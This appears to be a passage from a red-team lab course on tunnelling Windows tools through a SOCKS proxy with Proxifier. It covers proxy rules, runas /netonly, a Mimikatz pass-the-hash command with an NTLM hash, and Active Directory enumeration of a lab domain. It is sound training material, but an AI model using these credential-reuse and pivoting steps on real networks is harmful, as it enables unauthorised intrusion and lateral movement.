Windows Tools

We can also tunnel traffic from our Windows machine using a software utility called Proxifier. To create a new proxy entry, go to Profile > Proxy Servers. Click Add and enter the relevant details.

When asked whether to use this proxy by default, select No, but select Yes when prompted to go to the Proxification Rules. Here, we tell Proxifier which applications to proxy and under what conditions.

Click Add to create a new rule and use the following:

  • Name: Tools

  • Applications: Any

  • Target hosts: 10.10.120.0/24;10.10.122.0/24

  • Target ports: Any

  • Action: Proxy SOCKS5 10.10.5.50
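
To check which destinations this rule actually covers, the sketch below models it in Python. It is an added example, not part of the original page and not Proxifier's own code. It assumes first-match rule evaluation with a Direct default (the result of answering No above), handles only IP literals, and uses constructed destination ports.

```python
import ipaddress

# Values taken from the "Tools" rule on this page.
TOOLS_RULE = {
    "name": "Tools",
    "target_hosts": "10.10.120.0/24;10.10.122.0/24",
    "target_ports": "Any",
    "action": "Proxy SOCKS5 10.10.5.50",
}
# Assumption: answering "No" to "use this proxy by default" leaves the
# catch-all Default rule as a direct connection.
DEFAULT_ACTION = "Direct"


def parse_hosts(spec):
    """Split a semicolon-separated list of CIDR blocks into network objects."""
    return [ipaddress.ip_network(p.strip()) for p in spec.split(";") if p.strip()]


def port_matches(spec, port):
    """'Any' matches every port; this sketch otherwise accepts a ';' list."""
    if spec.strip().lower() == "any":
        return True
    return port in {int(p) for p in spec.split(";") if p.strip()}


def decide(rules, dest_ip, dest_port):
    """Return (rule name, action) of the first rule matching the destination."""
    ip = ipaddress.ip_address(dest_ip)
    for rule in rules:
        in_scope = any(ip in net for net in parse_hosts(rule["target_hosts"]))
        if in_scope and port_matches(rule["target_ports"], dest_port):
            return rule["name"], rule["action"]
    return "Default", DEFAULT_ACTION


if __name__ == "__main__":
    # Constructed destinations: an address inside the second /24, one in the
    # uncovered 10.10.121.0/24 gap between the two ranges, and the SOCKS
    # server itself (port 1080 is a placeholder, not from the page).
    for ip, port in [("10.10.122.10", 389), ("10.10.121.10", 445), ("10.10.5.50", 1080)]:
        print(f"{ip}:{port} -> {decide([TOOLS_RULE], ip, port)}")
```

Anything that falls through to Default leaves the machine directly rather than through the tunnel, which is why the gap between the two /24 ranges is worth checking.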

For authentication to work over the proxy, the application must be launched as a user from the target domain. This can be achieved using runas /netonly or Mimikatz.

Let's use Active Directory Users and Computers (ADUC) as an example. The file responsible for launching ADUC is dsa.msc, which is actually just a snap-in for mmc.exe. Launch mmc.exe via runas, then go to File > Add/Remove Snap-in (or Ctrl + M for short), add the ADUC snap-in, and click OK.

PS C:\Users\Attacker> runas /netonly /user:DEV\bfarmer mmc.exe
Enter the password for DEV\bfarmer:
Attempting to start mmc.exe as user "DEV\bfarmer" ...

Right-click on the snap-in, select Change Domain, enter dev.cyberbotic.io and click OK. You will see Proxifier begin to capture and relay traffic as ADUC loads the content. You can then continue to drill down into the users, computers and so on.

To achieve the same with Mimikatz:

mimikatz # privilege::debug
mimikatz # sekurlsa::pth /domain:DEV /user:bfarmer /ntlm:4ea24377a53e67e78b2bd853974420fc /run:mmc.exe

PowerShell cmdlets that support credential objects can also be used.

PS C:\Users\Attacker> $cred = Get-Credential
PS C:\Users\Attacker> Get-ADComputer -Server 10.10.122.10 -Filter * -Credential $cred | select DNSHostName

DNSHostName
-----------
dc-2.dev.cyberbotic.io
fs.dev.cyberbotic.io
wkstn-2.dev.cyberbotic.io
web.dev.cyberbotic.io
sql-2.dev.cyberbotic.io
wkstn-1.dev.cyberbotic.io
